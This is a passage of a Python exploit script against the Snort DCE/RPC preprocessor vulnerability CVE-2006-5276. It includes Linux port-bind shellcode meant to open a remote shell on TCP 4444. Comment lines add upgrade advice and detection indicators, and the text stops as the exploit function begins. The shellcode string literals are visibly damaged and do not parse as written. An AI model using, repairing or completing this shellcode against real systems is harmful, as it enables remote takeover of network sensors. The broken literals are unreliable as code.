#!/usr/bin/python
#
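# Remote exploit for the Snort DCE/RPC preprocessor vulnerability described in
# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.
# This code was tested against snort-2.6.1 running on Red Hat Linux 8.
# Defender note: the vulnerable code is the sensor's own DCE/RPC preprocessor,
# so the sensor is presumably exposed through the traffic it inspects rather
# than through a listening service. Upgrade to a Snort release that fixes
# CVE-2006-5276, or disable the DCE/RPC preprocessor until patched.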
#
# Author shall bear no responsibility for any screw ups caused by using this code
# Winny Thomas :-)
import os
import sys
import time
from scapy import *
# Linux portbind shellcode; Binds shell on TCP port 4444
# NOTE(review): as extracted here the literals are damaged. The quotes appear
# as \" and the backslashes of the \x escapes are missing, so these lines do
# not parse as Python in this form.
# Detection-relevant bytes visible below: 11 5c is 0x115c = 4444 (the listener
# port), and 2f 2f 73 68 / 2f 62 69 6e are the ASCII strings "//sh" and "/bin".
# Host-side indicators to alert on: an unexpected listener on TCP 4444 owned by
# the snort process, or the snort process spawning a shell.
shellcode = \"x31xdbx53x43x53x6ax02x6ax66x58x99x89xe1xcdx80x96\"
shellcode += \"x43x52x66x68x11x5cx66x53x89xe1x6ax66x58x50x51x56\"
shellcode += \"x89xe1xcdx80xb0x66xd1xe3xcdx80x52x52x56x43x89xe1\"
shellcode += \"xb0x66xcdx80x93x6ax02x59xb0x3fxcdx80x49x79xf9xb0\"
shellcode += \"x0bx52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53\"
shellcode += \"x89xe1xcdx80\"
def ExploitSnort(target):
# SMB packet borrowed from http://www.milw0rm